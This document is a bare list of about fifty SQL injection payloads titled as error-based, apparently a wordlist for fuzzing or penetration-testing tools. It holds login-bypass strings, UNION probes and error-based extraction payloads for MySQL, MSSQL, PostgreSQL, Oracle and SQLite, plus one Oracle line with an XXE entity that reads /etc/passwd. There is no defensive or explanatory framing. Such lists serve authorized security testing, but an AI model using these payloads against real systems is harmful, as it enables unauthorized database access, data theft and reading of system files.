# SQL Injection - Error-Based Payloads
'
''
`
')
"))
' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
' OR 'x'='x
1'
1"
1`
1' OR 1=1--
1" OR "1"="1
1 OR 1=1
' AND 1=0 UNION SELECT NULL--
' AND SLEEP(0)--
'; SELECT 1--
') OR ('1'='1
admin'--
' ORDER BY 1--
' ORDER BY 100--
' GROUP BY 1--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,@@version,3--
' AND 1=CONVERT(int,(SELECT @@version))--
' AND 1=CAST((SELECT @@version) AS int)--
' OR 1=1 LIMIT 1--
1' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM (SELECT 1 UNION SELECT 2)a GROUP BY x LIMIT 1)--
' AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1))x)--
' AND GTID_SUBSET(CONCAT(0x7e,(SELECT version()),0x7e),1)--
' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7e,version(),0x7e)) USING utf8)))--
' OR 1 IN (SELECT @@version)--
') AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--+
")) OR 1=CAST((SELECT @@version) AS int)--
' AND 1::int=CAST((SELECT version()) AS int)--
' AND 1=convert(int,db_name())--
' UNION SELECT NULL,UTL_INADDR.GET_HOST_ADDRESS((SELECT banner FROM v$version WHERE ROWNUM=1)),NULL FROM dual--
' AND CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE ROWNUM=1))--
' AND XMLType((SELECT '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' FROM dual))--
' OR RAISE(ABORT,(SELECT sqlite_version()))--
